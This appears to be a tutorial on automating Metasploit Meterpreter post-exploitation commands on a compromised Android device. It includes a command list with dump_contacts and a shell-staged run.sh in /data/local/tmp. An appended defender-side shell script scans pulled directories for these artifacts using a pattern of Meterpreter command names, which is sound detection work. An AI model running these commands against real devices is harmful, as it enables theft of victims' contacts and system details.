Android Meterpreter Auto Commands

TL;DR

This guide shows you how to automatically run commands when a Meterpreter session starts on an Android device using Metasploit. We'll use the sessions -i command with a script file containing your desired commands.

Prerequisites

  • Metasploit Framework installed and running
  • An active Meterpreter session on an Android device

Step-by-Step Guide

  1. Create a Command Script File
     First, create a text file (e.g., auto_commands.txt) containing the Meterpreter commands you want to execute automatically. Each command should be on a new line.

    sysinfo
    getuid
    dump_contacts
    
  2. Access the Session
     Open Metasploit and access your Meterpreter session using sessions -i <session_id>. Replace <session_id> with the actual ID of your active session.

    msf6 > sessions -i 1
    meterpreter > 
  3. Execute the Script
     Within the Meterpreter session, use the script command to execute your script. This will run all commands in the file sequentially.

    meterpreter > script /data/local/tmp/auto_commands.txt
    [*] Running script auto_commands.txt...
    ... (output of commands) ...
    [*] Script completed.
    
  4. Automate on Session Start (Post-Exploitation Module)
     For more robust automation, you can use a post-exploitation module to execute the script automatically when a session is created. This requires creating a custom module or modifying an existing one.

    • Create a Custom Post Module (Advanced): This involves writing Ruby code that defines a new module which executes your commands upon session creation. It’s beyond the scope of this basic guide but allows for greater control and flexibility.
    • Modify Existing Modules: Some post modules allow you to specify custom scripts or commands to run. Check the documentation of the specific module you are using.
  5. Alternative Method: Using a Shell Script (Less Reliable)
     You can attempt to execute a shell script from Meterpreter, but this is less reliable due to Android's security restrictions.

    meterpreter > shell
    mkdir /data/local/tmp/script_folder
    echo "sysinfo" > /data/local/tmp/script_folder/run.sh
    echo "getuid" >> /data/local/tmp/script_folder/run.sh
    chmod +x /data/local/tmp/script_folder/run.sh
    /data/local/tmp/script_folder/run.sh
    

    Note: This method may require root access or specific permissions to execute the script successfully.

  6. Troubleshooting
    • Permissions: Ensure that the script file has executable permissions if necessary (e.g., using chmod +x).
    • File Path: Double-check the path to your script file in the script command.
    • Command Syntax: Verify that all commands in the script are valid Meterpreter commands.
    • Android Security: Android’s security features may prevent certain commands from executing, especially without root access.
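
From the defender's side, the steps above leave recognisable files under /data/local/tmp (a command list and an executable run.sh). The following is an added example, not part of the original guide: it triages a copy of that directory (assumed to have been obtained with adb pull or from a forensic image) and flags executables and files made up of the Meterpreter command names used on this page. The function names and the marker list are hypothetical.

```shell
#!/bin/sh
# Added example (not from the original guide): triage a copy of a device's
# /data/local/tmp for the artifacts this page's steps leave behind.

# Command names taken from the page's sample script; extend as needed.
MARKERS='sysinfo|getuid|dump_contacts'

# scan_staging DIR
# Prints one "REASON<TAB>PATH" line per finding for regular files under DIR.
scan_staging() {
    find "$1" -type f | while IFS= read -r f; do
        # Executable files in a staging directory deserve a look.
        if [ -x "$f" ]; then
            printf 'executable\t%s\n' "$f"
        fi
        # A line consisting solely of a known Meterpreter command name.
        if grep -Eqx "[[:space:]]*($MARKERS)[[:space:]]*" "$f" 2>/dev/null; then
            printf 'meterpreter-commands\t%s\n' "$f"
        fi
    done
}

# count_findings DIR: number of findings, for alert thresholds.
count_findings() {
    scan_staging "$1" | wc -l | tr -d ' '
}

# make_sample: build a constructed tree mirroring this page's paths.
make_sample() {
    root=$(mktemp -d)
    mkdir -p "$root/script_folder"
    printf 'sysinfo\ngetuid\ndump_contacts\n' > "$root/auto_commands.txt"
    printf 'sysinfo\ngetuid\n' > "$root/script_folder/run.sh"
    chmod +x "$root/script_folder/run.sh"
    printf 'benign log line\n' > "$root/app.log"
    printf '%s\n' "$root"
}

# Usage: sh scan_staging.sh /path/to/pulled/tmp
if [ "$#" -gt 0 ]; then
    scan_staging "$1"
fi
```

A whole-line match on a single command name can hit benign files, so treat the output as leads for review rather than verdicts.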